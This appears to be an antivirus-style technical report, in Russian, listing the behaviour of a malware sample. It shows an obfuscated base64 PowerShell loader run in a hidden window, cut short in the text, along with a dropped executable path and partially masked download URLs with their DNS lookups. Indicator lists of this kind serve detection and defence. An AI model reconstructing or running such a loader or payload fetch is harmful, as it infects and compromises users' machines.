Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAHgAYwB3ADkAeQAyAD0AKAAnAEMAJwArACcAeAAnACsAKAAnAGYAJwArACcAbwB3AHkANgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAUgBQAHIAbwBGAGkATABFAFwAcABkAH...
- %HOMEPATH%\pdzsm1w\uujfkn_\g3lxecysz.exe
- %HOMEPATH%\pdzsm1w\uujfkn_\g3lxecysz.exe
- %HOMEPATH%\pdzsm1w\uujfkn_\g3lxecysz.exe
- http://ho####er-thoma.de/Resources/file/POyhgRg/
- http://gr##icon.es/SOPORTE/PFY2b1s5v35546172/
- http://hu####h-hannover.de/Filme/file/CzHV/
- http://le##er.de/cgi-bin/file/jOQmgRrKjAYB/
- http://ma####-design.de/cgi-bin/xtRegzHUptd/
- http://ma###umpir.de/bilder/file/UbubmSFOLBYF/
- DNS ASK ho####er-thoma.de
- DNS ASK gr##icon.es
- DNS ASK ho###nziz.de
- DNS ASK hu####h-hannover.de
- DNS ASK le##er.de
- DNS ASK ma####-design.de
- DNS ASK ma###umpir.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAHgAYwB3ADkAeQAyAD0AKAAnAEMAJwArACcAeAAnACsAKAAnAGYAJwArACcAbwB3AHkANgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAUgBQAHIAbwBGAGkATABFAFwAcABkAH...' (со скрытым окном)